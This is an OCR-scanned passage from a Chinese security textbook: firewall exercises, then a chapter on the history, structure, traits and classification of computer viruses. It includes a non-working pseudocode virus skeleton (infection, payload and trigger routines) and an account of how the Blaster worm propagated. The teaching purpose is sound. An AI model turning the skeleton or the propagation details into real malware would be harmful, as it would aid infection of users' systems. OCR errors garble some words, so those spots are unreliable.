(1) 下 列 ( ”) 技 术 可 以 缓解 Ipv4 地 址 匮乏 给 我 们 带 来 的 危机 。 
A.DNS B. IPSec C.NAT D. ACL 
(2) 最 初 的 静态 包 过 滤 防 火 墙 工作 在 TCP/IP 的 ( 。 )。 
A. 物理 层 B. 网 络 层 C. 传输 层 D. 应 用 层 
(3) 防火 墙 的 包 过 滤 技 术 不 能 检测 的 信息 是 (  )。 
A.IP 地 址 B. 端口 号 C. 协议 D. MAC 地 址 
3. 判断 题 
(1) 服务 器 通常 放 在 防火 墙 的 内 部 网 络 区域 ， 以 提高 安全 性 。 人 
(2) 包 过 滤 防 火 墙 把 网 络 数据 包 当 成 一 个 个 的 事件 处 理 。 人 二 
(3) 目前 状态 检测 技术 不 仅 能 对 TCP 协议 的 状态 进行 检测 ， 也 能 对 UDP 等 协议 的 连 
接 状 态 进行 检测 。 ( ) 
(4) 自 适 应 代理 防火 墙 可 以 在 应 用 层 进行 安全 检查 。 ( ) 
4. 简 答题 
(1) 分 布 式 防火 墙 的 优势 有 哪些 ? 
(2) 防火 墙 应 该 具备 哪些 网 络 功能 ? 
(3) 按照 防火 墙 的 工作 模式 ， 其 部 署 类 型 有 几 种 ? 
5. 操作 题 
登录 防火 墙 ， 进 行 如 下 配置 : 
拒绝 子 网 192.168.68.0 对 192.168.69.0 的 fp 访问; 


只 允许 192.168.122.0/24 网 段 对 服务 器 段 地 址 201.19.30.0/24 的 ssh 连接 ; 
内 网 地 址 出 网 时 ， 转 换 成 201.19.33.0/24 段 的 地 址 。 


目前 计算 机 病毒 与 反 病毒 技术 已 经 遍及 社会 的 各 个 领域 ， 互 联 
网 的 快速 发 展 及 其 应 用 的 多 样 化 成 为 计算 机 病毒 滋生 的 温床 ， 计 算 
机 病毒 通过 互联 网 络 、 电 子 邮 件 和 移动 终端 等 多 种 途径 ， 为 世界 带 
来 了 一 次 又 一 次 的 巨大 灾难 。 同 时 每 年 新 的 病毒 层出不穷 ， 据 不 完 
全 统计 ， 目 前 全 世界 每 天 新 发 现 的 病毒 (包括 恶意 软件 ) 数 量 | 


60000 个 。 另 外， 计算 机 病毒 带 来 的 网 络 恐 怖 主 又 
也 越 来 越 突出 ， 根 据 美国 政府 公布 的 一 份 国家 安全 
世纪 对 美国 国家 安全 威胁 最 严重 的 就 是 网 络 恐 怖 主义 ”， 
病毒 在 其 中 扮演 了 非常 重要 的 角色 ， 因 此 计算 机 病毒 与 反 六 
越 来 越 受 到 各 国政 府 和 安全 部 门 的 高 度 重视 。 
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8.1 计算 机 病毒 概述 


其 实 计算 机 病毒 的 概念 起 源 相当 早 ， 现 代 计 算 机 理论 的 先驱 者 汉 “。 诺 依 曼 早 在 第 一 部 
商用 电脑 出 现 前 ， 就 在 一 篇 《复杂 自动 装置 的 理论 及 组 织 的 进行 》 论 文中 描绘 了 未 来 计算 
机 病毒 程序 的 蓝图 ， 当 时 大 多 数 人 都 无 法 想象 会 存在 这 种 能 够 自我 繁殖 的 程序 。1975 
年 ， 美 国 科普 作家 约翰 。 布 鲁 勒 尔 在 一 本 名 为 《震荡 波 骑士 》 的 书 中 第 一 次 描写 了 在 信息 
社会 中 ， 计 算 机 作为 正义 和 收 恶 双方 斗争 的 工具 ， 该 书 也 成 为 当年 最 佳 畅 销 书 之 一 。 而 
1977 年 约翰 ，。 布 鲁 勒 尔 的 科幻 小 说 《P-1 的 春天 》 一 书 更 是 以 计算 机 病毒 为 主角 ， 描 写 了 
一 种 可 以 在 计算 机 中 互相 传染 的 病毒 程序 ， 并 最 终 控制 了 7000 台 计算 机 ， 造 成 了 一 场 灾 
难 ， 而 虚拟 科幻 小 说 世界 中 的 计算 机 病毒 也 终于 在 几 年 后 成 为 计算 机 使 用 者 的 真实 慎 梦 。 
本 节 我 们 就 来 认识 一 下 什么 是 计算 机 病毒 。 


8.1.1 计算 机 病毒 的 定义 
1. 计算 机 病毒 的 基本 定义 


20 世纪 60 年 代 ， 在 美国 著名 的 AT&T 贝尔 实验 室 中 ， 三 位 年 轻 的 程序 员 在 工作 之 
余 ， 玩 起 了 一 种 计算 机 游戏 ， 在 这 个 游戏 中 ， 他 们 应 用 了 冯 。 诺 依 曼 曾 经 提 到 过 的 程序 自 
我 复制 的 理论 ， 通 过 复制 自身 从 而 “ 吃 掉 ” 别 人 的 程序 ， 并 将 其 命名 为 “ 磁 芯 大 战 ”， 成 
为 “计算 机 病毒 ”的 第 一 个 雏形 。1983 年 ， 一 名 来 自 南 加 州 大 学 的 学 生 弗 雷 德 。 科 恩 
(Fred Cohen) 在 Unix 系统 下 写 出 了 可 自我 复制 及 具有 感染 能 力 的 程序 ， 并 可 引起 系统 宕 
机 ， 科 恩 为 了 证 明 其 理论 ， 将 这 些 程序 以 论文 发 表 ， 曾 在 当时 引起 了 不 小 的 震撼 。 不 过 ， 
这 种 具备 感染 与 破坏 性 的 程序 被 真正 称 之 为 “病毒 ”， 则 是 在 两 年 后 的 一 本 《科学 美国 
人 》 的 月 刊 中 。 一 位 名 叫 杜 特 尼 (AK.Dewdney) 的 专栏 作家 在 讨论 “ 磁 芯 大 战 ” 与 苹果 二 
型 电脑 时 ， 才 开始 把 这 种 程序 真正 称 之 为 病毒 。 从 此 以 后 对 于 这 种 具备 感染 性 和 破坏 性 的 
计算 机 程序 ， 我 们 将 其 称 之 为 “计算 机 病毒 ”， 而 弗 雷 德 。 科恩 也 被 称 为 “计算 机 病毒 之 
父 ”， 如 图 8-1 所 示 。 


8-1 ”被 称 为 “计算 机 病毒 之 父 ”的 弗 雷 德 * 科恩 博士 
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关于 计算 机 病毒 的 定义 ， 目 前 还 没有 一 个 得 到 公认 的 确切 定义 。 但 是 大 体 上 有 两 种 说 
法 ， 一 种 是 关于 计算 机 病毒 的 广义 定义 ， 泛 指 能 够 引起 计算 机 故障 ， 破 坏 计算 机 数据 的 程 
序 都 属于 计算 机 病毒 ， 另 一 种 是 关于 计算 机 病毒 的 狭义 定义 ， 弗 雷 德 。 科恩 在 1983 年 演 
示 了 世界 上 第 一 个 “计算 机 病毒 ”， 随 后 又 在 1989 年 提出 了 计算 机 病毒 的 定义 : “病毒 
程序 通过 修改 (操作 ) 而 传染 其 他 程序 ， 即 修改 其 他 程序 使 之 含有 病毒 程序 自身 的 精确 版 本 
或 可 能 演化 版 本 、 变 种 或 其 他 病毒 繁衍 体 。 病 毒 可 看 作 是 攻击 者 愿意 使 用 的 任何 代码 的 携 
带 者 。 病 毒 中 的 代码 可 经 由 系统 或 网 络 进行 扩散 ， 从 而 强行 修改 程序 和 数据 。” 

在 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 对 计算 机 病毒 进行 了 明确 地 定 
义 ， 计 算 机 病毒 是 指 “ 编 制 者 在 计算 机 程序 中 植 入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 影 响 
计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 计 算 机 病毒 是 利用 计算 
机 软件 或 硬件 上 所 固有 的 一 些 脆弱 性 漏洞 而 编制 的 一 组 指令 集 或 程序 代码 ， 通 常 它 会 通过 
某 种 途径 潜伏 进 计算 机 的 存储 介质 或 当前 进程 中 ， 一 旦 某 种 条 件 被 激活 ， 它 将 通过 修改 其 
他 程序 的 方式 将 自己 精确 地 复制 或 者 以 可 能 的 形式 自我 演化 并 植 入 到 其 他 程序 中 ， 从 而 达 
到 感染 其 他 合法 程序 ， 破 坏 计算 机 资源 的 目的 。 因 此 ， 计 算 机 病毒 与 医学 上 的 “病毒 ”不 
同 ， 它 是 人 为 制造 的 ， 因 其 在 制造 时 带 有 的 强烈 目的 性 ， 所 以 对 其 他 用 户 的 危害 也 很 大 。 


2. 计算 机 病毒 的 基本 结构 


通常 一 个 普通 的 计算 机 病毒 由 3 个 部 分 构成 : 感染 机 制 、 载 荷 机 制 以 及 触发 机 制 ， 下 
面 的 代码 是 一 段 典 型 的 计算 机 病毒 的 伪 码 序列 : 


Program Virus := 

{f0f0f0f7 

// 感 染 机 制 : 定义 为 病毒 传播 的 方式 或 途径 

subroutine infect executable := 

{loop:file = get_ random executable file; 

if first line of file = f0f0f0f then goto loop; 
prepend virus to file; 


} 

// 载 荷 机 制 : 定义 为 除了 自我 复制 以 外 的 所 有 动作 (如 果 存在 ) 
subroutine do damage := 

{whatever damage is to be done} 

// 触 发 机 制 : 定义 为 决定 是 否 在 此 时 传送 载荷 (如 果 确 实 存在 载荷 ) 的 例 程 
subroutine trigger pulled := 

{return true if some condition holds} 

// 主 程序 

main program := 

{infect executable; 

if trigger pulled then do damage; 

goto next; 

} 

next;} 


从 上 面 这 个 例子 可 以 看 出 ， 一 个 计算 机 病毒 通常 会 将 自身 的 副本 或 变 体 通过 一 种 或 多 
种 方式 附着 在 宿主 程序 上 ， 在 某 种 条 件 满足 的 情况 下 ， 会 对 计算 机 系统 造成 某 种 损害 。 而 
在 完成 自身 传染 和 对 计算 机 系统 造成 损害 后 ， 病 毒 仍 重新 将 控制 权 交还 给 宿主 程序 ， 从 而 
使 宿主 程序 仍 能 按 原来 的 执行 序列 继续 执行 。 同 时 ， 如 果 一 个 程序 被 定义 为 病毒 ， 只 有 感 
染 机 制 是 必须 存在 的 ， 而 载荷 和 触发 机 制 并 不 是 强制 的 ， 在 某 些 环境 下 ， 有 些 病 毒 程序 本 
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身 的 传播 也 可 能 被 描述 为 有 效 载荷 ， 例 如 某 些 蠕虫 病毒 。 此 外 ， 如 果 在 其 感染 机 制 中 并 入 
了 触发 机 制 ， 那 么 病毒 就 会 对 在 何 种 环境 下 造成 感染 具有 绝对 的 选择 权 。 因 此 上 述 结构 模 
型 仅仅 是 一 个 简化 的 模型 ， 实 际 的 病毒 结构 要 远 远 比 这 个 复杂 。 


8.1.2 ”计算 机 病毒 的 基本 特征 及 发 展 特点 
1. 计算 机 病毒 的 基本 特征 


计算 机 病毒 是 一 个 程序 ， 它 能 够 通过 把 自身 或 自身 的 一 个 变 体 包 含 到 其 他 程序 中 来 进 
行 传染 。 通 过 这 种 传染 机 制 ， 一 个 病毒 能 够 在 很 短 时 间 内 传播 到 整个 计算 机 系统 或 网 络 
中 。 一 般 来 说 ， 计 算 机 病毒 通常 具有 以 下 基本 特征 。 

1) ”传染 性 

根据 现代 操作 系统 的 原理 ， 正 常 的 计算 机 程序 有 着 自己 独立 的 内 存 空间 ， 程 序 间 彼此 
独立 运行 ， 同 时 正常 的 计算 机 程序 也 不 会 将 自身 的 代码 强行 连接 到 其 他 程序 上 的 。 但 计算 
机 病毒 不 同 ， 它 可 以 通过 各 种 可 能 的 渠道 ， 如 软盘 、 光 盘 和 计算 机 网 络 等 ， 将 自身 的 代码 
强行 传染 到 一 切 符合 其 传染 条 件 的 程序 中 。 当 你 在 一 台 机 器 上 发 现 了 病毒 时 ， 往 往 曾 经 在 
这 台 计 算 机 上 使 用 过 的 文件 也 已 感染 上 了 病毒 ， 而 与 这 台 机 器 联网 的 其 他 计算 机 或 许 也 被 
该 病毒 侵 染 了 。 可 见 ， 传 染 性 是 计算 机 病毒 最 重要 的 一 条 特性 ， 是 否 具有 传染 性 是 判别 一 
段 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 

2) “隐蔽 性 

计算 机 病毒 程序 通常 具有 短小 精 悍 、 方 法 巧妙 的 特点 ， 通 常 潜入 在 正常 的 进程 或 文件 
中 ， 同 时 病毒 程序 与 正常 程序 不 容易 被 区 别 ， 在 没有 防护 措施 的 情况 下 ， 计 算 机 病毒 程序 
在 取得 系统 控制 权 后 ， 可 以 在 很 短 的 时 间 内 感染 大 量程 序 ， 而 且 受 到 感染 后 ， 计 算 机 病毒 
仍 会 将 控制 权 交还 给 宿主 程序 ， 因 此 计算 机 系统 在 病毒 未 发 作 时 通常 仍 能 正常 运行 ， 用 户 
不 会 感到 有 任何 异常 。 正 是 由 于 其 隐蔽 性 ， 计 算 机 病毒 可 以 在 用 户 没 有 察觉 的 情况 下 扩散 
到 其 他 计算 机 中 。 大 部 分 病毒 的 代码 之 所 以 设计 得 非常 短小 ， 也 是 为 了 隐藏 。 多 数 病毒 一 
般 只 有 几 百 或 几 千 字 节 ， 而 计算 机 对 文件 的 存 取 速 度 很 快 ， 病 毒 将 这 短 短 的 几 百 字 节 加 入 
到 正常 程序 之 中 ， 使 人 不 易 察觉 。 

3) ”潜伏 性 

大 部 分 病毒 在 感染 系统 之 后 不 会 马上 发 作 ， 它 可 以 长 时 间 隐 藏 在 系统 中 ， 只 有 在 满足 
某 些 特定 条 件 时 才 启 动 其 破坏 功能 。 因 此 ， 计 算 机 病毒 在 大 规模 爆发 时 ， 已 经 感染 了 相当 
数量 的 计算 机 。 如 “PETER-2” 病 毒 在 每 年 2 月 27 日 会 提 3 个 问题 ， 答 错 后 将 会 把 硬盘 
加 密 。 而 著名 的 “黑色 星期 五 ”每 估 13 号 的 星期 五 改作。 又 如 国内 的 “上 海 一 号 ”会 在 
每 年 三 、 六 、 九 月 的 13 日 发 作 。 当 然 ， 最 令 人 难忘 的 便 是 曾经 在 1999 年 4 月 26 日 大 规 
模 发 作 的 CIH 病毒 。 病 毒 的 潜伏 性 特征 给 计算 机 的 反 病毒 工作 造成 了 很 大 的 困难 。 

4) “破坏 性 
任何 病毒 只 要 侵入 系统 ， 都 会 对 系统 及 应 用 程序 产生 不 同 程度 的 影响 。 良 性 病毒 可 能 
只 显示 些 画面 或 发 出 点 音乐 、 无 聊 的 语句 ， 或 者 根本 没有 任何 破坏 动作 ， 只 是 会 占用 系统 
资源 。 亚 性 病毒 则 具有 明确 的 目的 ， 或 破坏 数据 、 删 除 文件 ， 或 加 密 磁 盘 、 格 式 化 磁盘 ， 
或 进行 数据 窃取 与 监听 。 
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5) 不 可 预见 性 

从 对 计算 机 病毒 的 检测 方面 来 看 ， 计 算 机 病毒 还 有 不 可 预见 性 。 不 同 种 类 的 病毒 ， 其 
代码 千差万别 ， 但 有 些 操作 是 共有 的 ， 如 驻 留 内 存 、 修 改 中 断 等 。 虽 然 可 以 利用 病毒 的 这 
种 技术 共性 来 检测 出 一 些 新 病毒 ， 但 由 于 目前 的 软件 种 类 极其 丰富 ， 而 病毒 技术 也 在 不 断 
地 更 新 ， 另 外 某 些 正常 程序 也 使 用 了 类 似 病 毒 的 操作 ， 甚 至 借鉴 了 某 些 病毒 的 技术 ， 因 此 
单纯 使 用 这 种 方法 对 病毒 进行 检测 势必 会 产生 许多 误 报 和 漏 报 。 


2. 计算 机 病毒 发 展 的 新 特点 


另外 ， 随 着 计算 机 病毒 技术 的 不 断 发 展 ， 互 联网 络 成 为 计算 机 病毒 传播 的 主要 途径 ， 
另外 在 与 反 病 毒 技 术 的 斗争 中 ， 计 算 机 病毒 的 变形 速度 、 隐 蔽 性 、 结 构 复 杂 性 和 破坏 力也 
在 不 断 地 提高 ， 混 合 型 病毒 的 出 现 使 以 前 对 计算 机 病毒 的 分 类 逐渐 失去 意义 ， 也 使 反 病毒 
工作 更 困难 了 。 计 算 机 病毒 的 发 展 呈现 出 一 些 新 的 特点 。 

1) 计算 机 网 络 成 为 计算 机 病毒 滋生 的 温床 

早期 计算 机 病毒 只 通过 文件 拷贝 来 进行 传播 ， 其 最 常见 的 传播 媒介 是 软盘 和 盗版 光盘 
等 。 随 着 计算 机 网 络 特别 是 互联 网 的 发 展 ， 目 前 计算 机 病毒 主要 是 通过 网 络 方式 进行 传 
播 ， 而 且 计算 机 网 络 越发 达 ， 越 有 助 于 计算 机 病毒 传播 速度 的 提高 和 感染 范围 的 扩大 ， 因 
此 可 以 这 么 说 ， 计 算 机 网 络 带 来 了 计算 机 病毒 传染 的 高 效率 。 这 一 点 可 以 通过 曾经 引起 巨 
大 互联 网 灾难 的 “冲击 波 ” 和 “震荡 波 ”病毒 来 证 明 。 以 “冲击 波 ” 为 例 ， 它 是 一 种 利用 
RPC DCOM 缓冲 溢出 漏洞 进行 传播 的 互联 网 蠕虫 ， 它 能 够 使 遭受 攻击 的 系统 崩溃 ， 并 通 
过 互联 网 迅速 向 存在 该 种 漏洞 的 系统 草 延 ， 它 通过 持续 扫描 具有 漏洞 的 系统 ， 并 检查 当前 
计算 机 是 否 有 可 用 的 网 络 连接 ， 然 后 从 已 经 被 感染 的 计算 机 上 下 载 能 够 进行 自我 复制 的 代 
码 MSBLAST.EXE， 并 向 具有 该 漏洞 的 计算 机 135 端口 发 送 数据 。 如 果 没 有 连接 ， 蠕 虫 每 
间隔 10 秒 对 Intermet 连接 进行 检查 ， 直 到 Internet 连接 被 建立 。 一 旦 Internet 连接 建立 ， 
蠕虫 会 打开 被 感染 的 系统 上 的 4444 端口 ， 并 在 端口 69 进行 监听 ， 扫 描 互 联网 ， 尝 试 连接 
至 其 他 目标 系统 的 135 端口 并 对 它们 进行 攻击 。 与 以 前 计算 机 病毒 相 比 ， 该 类 型 的 蠕虫 病 
毒 具有 更 强 的 主动 性 (主动 扫描 可 以 感染 的 计算 机 ) 和 独立 性 (不 再 依赖 宿主 文件 )。 

2) “计算 机 病毒 的 变异 速度 极 快 ， 并 具有 混合 型 特征 

以 “震荡 波 ” 病 毒 为 例 ， 在 “震荡 波 ” 大 规模 爆发 不 久 ， 它 的 变形 病毒 就 出 现 了 ， 并 
且 病 毒 变种 不 断 得 到 更 新 ， 从 变种 A 到 变种 下 的 出 现 ， 时 间 不 用 一 个 月 。 当 人 们 忙于 扑 
杀 “ 震 荡 波 ” 的 同时 ， 一 个 新 的 计算 机 病毒 “震荡 波 杀手 ”又 应 运 而 生 ， 它 虽然 会 关闭 
“震荡 波 ”等 计算 机 病毒 的 进程 ， 但 同时 带 来 的 危害 与 “震荡 波 ” 类 似 ， 包 括 堵塞 网 络 、 
耗 尽 计算 机 资源 、 随 机 倒计时 关机 和 定时 对 某 些 服务 器 进行 攻击 等 。 在 反 病 毒 服务 提供 商 
Sophos 公布 的 一 份 报告 中 称 ， 当 年 5 月 份 互联 网 上 出 现 的 各 类 新 的 蠕虫 病毒 种 类 数量 创 
下 30 个 月 以 来 的 新 高 ， 共 出 现 了 959 种 新 病毒 ， 创 下 了 自 2001 年 12 月 份 以 来 的 新 高 。 
这 959 种 新 病毒 中 包括 了 之 前 一 些 老病 毒 的 新 变种 。 计 算 机 病毒 向 混合 型 、 多 样 化 发 展 的 
结果 是 一 些 病毒 会 更 加 精巧 ， 另 一 些 病毒 则 会 变 得 更 加 复杂 ， 可 以 混合 多 种 病毒 特征 ， 例 
如 红色 代码 病毒 (Code Red) 就 是 综合 了 文件 型 、 蠕 虫 型 病毒 的 特性 ， 这 种 发 展 趋势 会 造成 
反 病 毒 工 作 更 加 困难 。2004 年 1 月 27 日 ， 一 种 新 型 蠕虫 病毒 在 企业 电子 邮件 系统 中 传 
播 ， 导 致 了 邮件 数量 暴 增 ， 从 而 阻塞 了 网 络 ， 不 同 的 反 病 毒 厂商 将 其 命名 为 Novarg、 
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Mydoom、SCO 炸弹 、 诺 威 格 、 小 邮差 变种 等 ， 该 病毒 采用 的 是 病毒 和 垃圾 邮件 相 结合 的 
战术 ， 不 知情 用 户 的 推波助澜 使 得 这 种 病毒 的 传播 速度 比 其 他 几 种 病毒 的 传播 速度 更 快 。 

3) ”计算 机 病毒 的 运行 和 传播 方式 更 加 隐蔽 

当前 计算 机 病毒 通常 都 会 借助 系统 一 些 常见 的 正常 进程 来 隐藏 自己 ， 例 如 在 被 计算 机 
病毒 感染 的 计算 机 中 ， 你 可 能 只 看 到 一 些 常 见 的 正常 进程 如 svchost、taskmon 等 ， 其 实 它 
们 就 有 可 能 是 计算 机 病毒 进程 。 有些 病毒 还 会 借助 当前 一 些 重 要 的 应 用 来 伪装 自己 ， 例 
“ 蓝 盒子 (Worm.Lehs)”、“V 宝贝 (Win32.Worm.BabyV)” 病 毒 和 “斯 文 (Worm.Swen)” 
病毒 ， 都 是 将 自己 伪装 成 微软 公司 的 补丁 程序 来 进行 传播 的 。 这 些 伪装 令 人 防不胜防 。 此 
外 ， 一 些 感染 QQ、MSN 等 即时 通讯 软件 的 计算 机 病毒 也 会 通过 一 些 伪装 的 网 址 或 文件 来 
感染 你 的 计算 机 系统 。 

4) “利用 操作 系统 漏洞 传播 

操作 系统 是 联系 计算 机 用 户 和 计算 机 系统 的 桥梁 ， 也 是 计算 机 系统 的 核心 ， 目 前 应 用 
最 为 广泛 的 是 Windows 系列 的 操作 系统 。2003 年 的 “蠕虫 王 ”、“ 冲 击 波 ” 和 2004 年 的 
“震荡 波 ” 等 病毒 都 是 利用 Windows 系统 自身 的 漏洞 ， 在 短 短 的 几 天 内 就 对 整个 互联 网 
造成 了 巨大 的 危害 。 由 于 开发 操作 系统 是 一 项 复杂 的 工程 ， 出 现 漏洞 及 错误 是 难免 的 ， 而 
正 是 这 些 漏 洞 和 错误 给 计算 机 病毒 和 黑客 提供 了 一 个 很 好 的 表演 舞台 。 例 如 在 微软 安全 中 
心 发 布 的 MS04-028 漏洞 安全 公告 中 提 及 的 GDI+ 漏 洞 ， 该 漏洞 涉及 GDI+ 组 件 ， 在 用 户 浏 
览 特 定 JPG 图片 的 时 候 ， 会 导致 缓冲 区 溢出 ， 进 而 可 以 执行 病毒 攻击 代码 。 该 漏洞 可 能 
发 生 在 所 有 的 Windows 操作 系统 上 ， 并 且 针 对 所 有 基于 正 浏览 器 内 核 的 软件 、Office 系 
列 软件 、 微 软 .NET 开发 工具 ， 以 及 微软 其 他 的 图 形 相 关 软 件 等 ， 这 可 能 是 有 史 以 来 威胁 
用 户 数量 最 广 的 高 危 漏 洞 。 这 类 病毒 (“ 图 片 病毒 ”) 有 可 能 通过 以 下 形式 发 作 : 一 是 通过 
群发 邮件 ， 附 带 有 病毒 的 JPG 图 片 文件 ， 二 是 采用 恶意 网 页 形式 ， 浏 览 网 页 中 的 JPG 文 
件 、 甚 至 网 页 上 自 带 的 图 片 即 可 被 病毒 感染 ， 三 是 通过 即时 通信 软件 (如 QQ、MSN 等 ) 的 
自 带 头像 等 图 片 或 者 发 送 图 片 文件 来 进行 传播 。 

5) ”计算 机 病毒 技术 与 黑客 技术 日 益 融 合 

当前 的 计算 机 病毒 和 黑客 技术 逐步 趋 于 融合 ， 严 格 来 说 ， 木 马 程序 和 后 门 程序 并 不 是 
计算 机 病毒 ， 因 为 它们 不 能 自我 复制 和 扩散 。 但 目前 大 多 数 木马 程序 和 后 门 程序 都 可 以 通 
过 计算 机 病毒 来 进行 传播 ， 获 取 系 统 权 限 ， 同 时 木马 程序 和 后 门 程序 也 可 进一步 加 速 病 毒 
的 传播 和 渗透 。 以 “QQ 叛徒 ”(Trojan.QQbot.a) 病 毒 为 例 ， 这 是 全 球 首 个 可 以 通过 QQ 控 
制 系统 的 木马 病毒 ， 还 会 造成 强制 系统 重启 、 被 迫 下 载 病毒 文件 、 抓 取 当 前 系统 屏幕 等 危 
害 。 另 一 个 典型 的 例子 就 是 2003 年 11 月 爆发 的 “爱情 后 门 ”T 型 变种 病毒 ， 该 病毒 具有 
蠕虫 、 黑 客 、 后 门 等 多 种 病毒 特性 ， 杀 伤 力 和 危害 性 都 非常 大 ， 并 且 该 蠕虫 病毒 可 以 通过 
电子 邮件 附件 来 进行 传播 ， 当 用 户 打 开 并 运行 附件 内 的 蠕虫 程序 后 ， 蠕 虫 就 会 立即 以 用 户 
信箱 内 的 电子 邮件 地 址 为 目标 ， 向 外 发 送 大 量 带 有 蠕虫 附件 的 欺骗 性 邮件 ， 同 时 在 用 户主 
机 上 留 下 可 以 上 载 并 执行 任意 代码 的 后 门 ， 这 些 计 算 机 病毒 成 为 后 来 计算 机 病毒 技术 与 黑 
客 技术 融合 的 雏形 。 

6) ”物质 利益 将 成 为 推动 计算 机 病毒 发 展 的 最 大 动力 

从 计算 机 病毒 的 发 展 史 来 看 ， 对 技术 的 兴趣 和 爱好 曾经 是 计算 机 病毒 发 展 的 源 动 力 。 
但 越 来 越 多 的 迹象 表明 ， 在 当前 和 未 来 的 信息 化 社会 中 ， 物 质 利益 将 成 为 推动 计算 机 病毒 


第 8 章 计算 机 病毒 与 反 病 毒 技术 259 


发 展 的 最 大 动力 。 例 如 “网 银 大 盗 ” 的 变种 B 型 病毒 ， 该 病毒 可 盗 取 大 量 的 网 银 账号 和 
密码 ， 而 “Korgo” 病 毒 的 主要 攻击 目标 也 是 银行 账户 和 信用 卡 信息 。 除 了 网 上 银行 系 
统 ， 网 上 的 股票 账号 、 信 用 卡 账号 、 房 屋 交易 乃至 游戏 账号 等 都 可 能 被 病毒 攻击 ， 甚 至 网 
上 的 虚拟 货币 也 在 病毒 目标 范围 之 内 。 例 如 比较 著名 的 有 “快乐 耳 条 ”、“ 有 上 股票 窍 密 者 ” 
等 。 针 对 网 络 游戏 的 计算 机 病毒 在 这 一 点 也 表现 非常 明显 ， 网 络 游戏 账号 和 数 以 千 元 甚至 
万 元 的 虚拟 装备 被 计算 机 病毒 持 有 者 所 窃取 。 因 此 现在 不 少 银行 都 提供 了 网 上 验证 或 密码 
钥匙 ， 用 以 防范 其 信息 被 计算 机 病毒 和 黑客 窃取 。 

总 之 ， 计 算 机 病毒 与 反 病 毒 技 术 的 发 展 就 像 一 场 拉锯 战 ， 而 计算 机 病毒 在 这 场 战 争 中 
显然 总 是 处 于 主动 地 位 ， 这 也 是 由 于 上 述 计算 机 病毒 的 特征 所 导致 的 ， 有 其 必然 的 一 面 。 


8.1.3 ”计算 机 病毒 的 分 类 


关于 计算 机 病毒 的 分 类 ， 目 前 还 没有 统一 的 标准 ， 但 通常 可 按照 计算 机 病毒 不 同 的 属 
性 方法 来 进行 分 类 。 
1. 依据 病毒 寄生 的 媒介 来 分 类 


根据 计算 机 病毒 传播 依赖 的 媒介 ， 可 将 计算 机 病毒 划分 为 网 络 病毒 、 文 件 病毒 和 引导 
型 病毒 。 网 络 病毒 通过 计算 机 网 络 来 传播 感染 网 络 中 的 可 执行 文件 ;文件 病毒 则 通过 感染 
计算 机 中 的 文件 来 达到 病毒 的 传播 和 寄生 目的 ， 而 引导 型 病毒 则 通过 感染 计算 机 的 启动 扇 
区 BOOT 和 硬盘 的 系统 引导 扇 区 MBR 来 达到 感染 计算 机 系统 的 目的 。 还 有 这 三 种 病毒 的 
混合 型 ， 例 如 多 型 病毒 文件 和 引导 型 ) 以 感染 文件 和 引导 扇 区 为 目标 ， 通 常 这 样 的 病毒 程 
序 由 于 使 用 了 加 密 和 变形 的 算法 ， 因 此 其 反 病 毒 的 工作 也 会 更 加 复杂 。 


2. 依据 病毒 传染 的 方法 来 分 类 


根据 计算 机 病毒 传染 的 方法 ， 可 将 计算 机 病毒 划分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 其 
中 ， 驻 留 型 病毒 感染 计算 机 后 ， 会 将 自身 的 运行 代码 驻 留 到 内 存 中 ， 并 通过 修改 革 些 系统 
调用 来 达到 隐藏 自 身 的 目的 ， 同 时 它 会 一 直 处 于 运行 状态 ， 并 利用 自身 在 内 存 中 的 副本 对 
其 他 程序 进行 传染 ， 直 到 关机 或 重新 启动 ， 而 非 驻 留 型 病毒 并 不 会 直接 感染 计算 机 内 存 ， 
虽然 一 些 非 驻 留 型 病毒 也 会 在 内 存 中 留 有 部 分 代码 ， 但 是 并 不 通过 这 部 分 代码 进行 传染 ， 
非 驻 留 型 病毒 仅 在 病毒 代码 执行 时 进行 病毒 的 传染 ， 在 病毒 代码 执行 完成 后 ， 病 毒 在 内 存 
中 就 不 再 活跃 了 。 

3. 依据 病毒 的 破坏 能 力 来 分 类 


根据 病毒 的 破坏 能 力 ， 可 将 计算 机 病毒 划分 为 无 害 型 、 无 危险 型 、 危 险 型 和 高 危 型 。 
其 中 无 害 型 病毒 除了 传染 时 减少 磁盘 的 可 用 空间 外 ， 对 系统 没有 其 他 影响 ， 无 危险 型 病毒 
则 仅仅 是 减少 了 内 存 使 用 量 ， 或 显示 一 些 特定 图 像 、 发 出 一 些 特殊 声音 等 ， 以 引起 人 们 的 
注意 ;危险 型 病毒 则 会 在 计算 机 系统 操作 中 造成 严重 的 错误 ， 而 高 危 型 病毒 通常 会 删除 程 
序 、 破 坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 的 信息 ， 通 常 这 些 病毒 对 系统 造成 的 危 
害 ， 并 不 是 本 身 的 算法 中 存在 危险 的 调用 ， 而 是 当 它们 传染 时 会 引起 无 法 预料 的 和 灾难 性 
的 破坏 。 由 病毒 引起 其 他 的 程序 产生 的 错误 也 会 破坏 文件 和 扇 区 ， 这 些 病 毒 也 按照 它们 引 
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起 的 破坏 能 力 划 分 。 
计算 机 病毒 的 破坏 能 力 体现 了 病毒 的 杀伤 力 及 性 质 ， 按 照 病 毒 的 破坏 目标 和 攻击 部 位 
可 归纳 为 如 下 几 个 方面 : 
@ ”攻击 系统 数据 区 ， 攻 击 范围 包括 : 硬盘 主 引导 扇 区 、Boot 扇 区 、FAT 表 、 文 件 
目录 等 ， 一 般 来 说 ， 攻 击 系统 数据 区 的 病毒 都 是 恶性 病毒 ， 受 损 的 数据 是 不 易 恢 
复 的 。 还 有 些 病毒 会 攻击 计算 机 的 CMOS 区 ， 破 坏 系统 CMOS 中 的 数据 ， 例 如 
系统 时 钟 、 磁 盘 类 型 、 内 存 容量 等 。 
@ 攻击 文件 和 磁盘 ， 病 毒 对 文件 和 磁盘 的 攻击 方式 很 多 ， 例 如 删除 、 改 名 、 蔡 换 、 
丢失 、 碎 片 化 、 假 冒 文 件 、 丢 失 文 件 簇 、 不 写 盘 、 写 操作 变 读 操作 、 写 盘 时 丢 字 
节 等 。 
@ 攻击 内 存 ， 病 毒 额外 地 占用 和 消耗 内 存 资源 ， 可 以 导致 一 些 大 的 程序 阻塞 ， 其 攻 
